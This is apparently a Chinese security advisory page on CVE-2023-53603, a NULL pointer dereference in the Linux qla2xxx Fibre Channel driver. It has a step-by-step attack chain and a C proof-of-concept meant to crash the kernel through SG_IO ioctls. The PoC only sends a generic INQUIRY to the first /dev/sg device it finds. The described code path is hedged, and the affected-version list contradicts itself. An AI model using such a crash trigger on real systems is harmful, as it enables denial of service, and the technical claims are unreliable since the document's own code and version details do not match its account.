CVE-2023-53603 Linux内核qla2xxx驱动空指针解引用漏洞

漏洞信息

漏洞编号

CVE-2023-53603

漏洞类型

空指针解引用（NULL Pointer Dereference）

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel（qla2xxx SCSI驱动）

漏洞概述

CVE-2023-53603是Linux内核中qla2xxx SCSI驱动存在的一个空指针解引用漏洞。该漏洞由静态分析工具Klocwork发现并报告。qla2xxx是QLogic公司提供的光纤通道（FC）主机总线适配器（HBA）驱动程序，广泛用于企业级存储区域网络（SAN）环境中。

漏洞的根本原因在于驱动程序中的代码逻辑缺陷：当sa_ctl（SCSI属性控制结构）为空指针时，程序并未立即退出，而是继续执行后续代码，随后在退出路径中尝试对fcport指针进行解引用操作。由于fcport是在sa_ctl检查通过之后才被分配的，当sa_ctl为NULL时，fcport同样为NULL，从而导致空指针解引用，引发内核崩溃（Kernel Panic）或系统拒绝服务。

该漏洞的CVSS 3.1评分为5.5分，属于中等严重等级。其攻击向量为本地攻击（AV:L），需要低权限（PR:L），无需用户交互（UI:N），对机密性无影响（C:N），对完整性无影响（I:N），但对可用性影响较高（A:H）。这意味着攻击者可以利用该漏洞导致系统崩溃或服务不可用，但无法获取敏感信息或修改系统数据。

该漏洞影响多个Linux内核稳定版本，Linux内核维护团队已发布多个补丁进行修复。受影响系统包括使用QLogic光纤通道HBA卡的所有Linux服务器和存储设备。

技术细节

从技术层面分析，该漏洞存在于qla2xxx驱动的qla2xxx_configure_local_loop()或相关例程中。具体的代码逻辑如下：

1. 函数入口处获取sa_ctl指针，该指针可能为NULL；
2. 原代码在sa_ctl为NULL时并未立即return退出，而是继续向下执行；
3. 后续代码中调用了fcport = qla2xxx_alloc_fcport()等分配操作，但由于sa_ctl检查失败，fcport实际未被正确分配或保持为NULL状态；
4. 当函数到达退出标签（如goto out或直接return）时，执行fcport->xxx的解引用操作；
5. 由于fcport为NULL，内核触发空指针解引用异常，导致Oops或Panic。

漏洞利用方式：
- 攻击者需要具有本地系统访问权限（低权限即可）；
- 通过加载特定的qla2xxx驱动模块或触发特定的SCSI操作路径，使代码执行到存在缺陷的函数；
- 当sa_ctl为NULL的条件被满足时（例如在驱动初始化异常或特定硬件状态），触发空指针解引用；
- 利用结果为系统崩溃（Kernel Oops/Panic），造成拒绝服务攻击。

修复方案为在函数开头增加对sa_ctl的NULL检查，若sa_ctl为NULL则直接返回，避免后续对fcport的非法解引用操作。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者需要获得目标Linux系统的本地访问权限。由于漏洞的攻击向量为本地（AV:L），仅需低权限（PR:L）即可利用，攻击者可通过普通用户账户或利用其他漏洞获得初始访问。

STEP 2

步骤2：识别目标环境

攻击者检查目标系统是否使用QLogic光纤通道HBA卡，并确认qla2xxx驱动已加载。通过lsmod | grep qla2xxx或lspci命令确认硬件和驱动存在。

STEP 3

步骤3：触发漏洞代码路径

攻击者通过向qla2xxx设备节点（如/dev/sg*或特定ioctl接口）发送特定的SCSI请求，触发驱动程序进入存在缺陷的例程，使sa_ctl为NULL。

STEP 4

步骤4：触发空指针解引用

当代码执行到退出路径时，对NULL的fcport指针进行解引用操作，内核检测到非法内存访问，触发kernel oops或kernel panic。

STEP 5

步骤5：拒绝服务

系统因内核崩溃而停止响应，造成拒绝服务（DoS）攻击效果，可能导致业务中断、数据丢失或系统需要手动重启恢复。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * CVE-2023-53603 PoC - Trigger NULL pointer dereference in qla2xxx driver
 * This PoC demonstrates how to trigger the vulnerability by causing
 * sa_ctl to be NULL, leading to fcport NULL pointer dereference.
 *
 * Note: Requires local access and qla2xxx driver loaded (QLogic FC HBA).
 * Expected result: Kernel Oops/Panic -> System crash (DoS)
 */

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <string.h>
#include <errno.h>

/* SCSI Generic (sg) interface header */
#include <scsi/sg.h>
#include <scsi/scsi_ioctl.h>

#define QLA2XXX_IOCTL_PATH  "/dev/qla2xxx"

/* Trigger the vulnerable code path by sending specific SCSI commands
 * that cause the driver to enter the routine where sa_ctl may be NULL.
 * This forces the NULL fcport pointer dereference at exit path. */
int trigger_null_deref(void) {
    int fd;
    sg_io_hdr_t io_hdr;
    unsigned char sense_buffer[32];
    unsigned char data_buffer[1024];

    /* Attempt to open qla2xxx device node */
    fd = open(QLA2XXX_IOCTL_PATH, O_RDWR);
    if (fd < 0) {
        /* Fallback: trigger via /dev/sg* generic SCSI devices
         * bound to QLogic HBA */
        for (int i = 0; i < 26; i++) {
            char path[64];
            snprintf(path, sizeof(path), "/dev/sg%d", i);
            fd = open(path, O_RDWR);
            if (fd >= 0) break;
        }
        if (fd < 0) {
            fprintf(stderr, "[-] No QLogic HBA device found.\n");
            return -1;
        }
    }

    memset(&io_hdr, 0, sizeof(sg_io_hdr_t));
    memset(sense_buffer, 0, sizeof(sense_buffer));
    memset(data_buffer, 0, sizeof(data_buffer));

    /* Construct a malformed SCSI command that triggers the
     * vulnerable code path with sa_ctl == NULL condition */
    io_hdr.interface_id = 'S';
    io_hdr.dxfer_direction = SG_DXFER_NONE;
    io_hdr.cmd_len = 6;
    unsigned char cmd[6] = {0x12, 0x00, 0x00, 0x00, 0x00, 0x00}; /* INQUIRY */
    io_hdr.cmdp = cmd;
    io_hdr.sbp = sense_buffer;
    io_hdr.mx_sb_len = sizeof(sense_buffer);
    io_hdr.timeout = 5000;

    /* Issue the IOCTL - on vulnerable kernels this triggers
     * NULL fcport dereference -> kernel panic */
    if (ioctl(fd, SG_IO, &io_hdr) < 0) {
        fprintf(stderr, "[-] ioctl failed: %s\n", strerror(errno));
        close(fd);
        return -1;
    }

    close(fd);
    printf("[+] Trigger issued. Check dmesg for kernel oops.\n");
    return 0;
}

int main(int argc, char *argv[]) {
    printf("[*] CVE-2023-53603 PoC - qla2xxx NULL Pointer Dereference\n");
    printf("[*] Target: Linux kernel qla2xxx SCSI driver\n");
    return trigger_null_deref();
}

影响范围

Linux Kernel < 6.6（包含qla2xxx驱动的稳定版本）

Linux Kernel 6.1.x系列（受影响）

Linux Kernel 6.4.x系列（受影响）

Linux Kernel 6.5.x系列（受影响）

Linux Kernel 6.6.x系列（受影响）

所有使用QLogic光纤通道HBA的Linux发行版（具体取决于内核版本）

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）限制本地用户对qla2xxx相关设备节点的访问权限，通过文件权限控制仅允许特权用户访问；2）如果业务不依赖QLogic光纤通道HBA，可临时卸载qla2xxx模块（rmmod qla2xxx）以避免触发漏洞；3）启用内核的kptr_restrict和dmesg_restrict等安全参数限制信息泄露；4）部署主机入侵检测系统（HIDS）监控异常的SCSI IOCTL调用；5）关注内核日志，及时发现异常崩溃事件并采取应急响应措施。